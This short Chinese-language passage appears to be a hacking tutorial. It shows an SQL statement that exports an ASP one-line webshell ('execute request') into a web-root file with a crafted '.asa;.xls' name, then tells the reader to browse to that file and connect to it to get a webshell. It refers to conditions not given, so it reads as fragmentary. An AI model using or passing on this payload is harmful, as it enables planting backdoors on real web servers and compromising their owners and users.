1、这个是SQl语句 SELECT ‘<%execute request(“a”)%>’ into [YCMS_admin] in ‘C:Inetpubwwwrootadmin2.asa;2.xls’ ‘excel 8.0;’ from YCMS_admin
2、点击执行后然后直接访问网站的路径后面加上导出的名字也就是一句话的文件名就可以获得一句话的的完整的URL 然后直接进行一句话链接就可以获得webshell了。
3、当然也不是在所有的环境都够利用。
4、满足以上条件即可在sql执行语句里面逐一执行以下语句就可以导出一句话了。
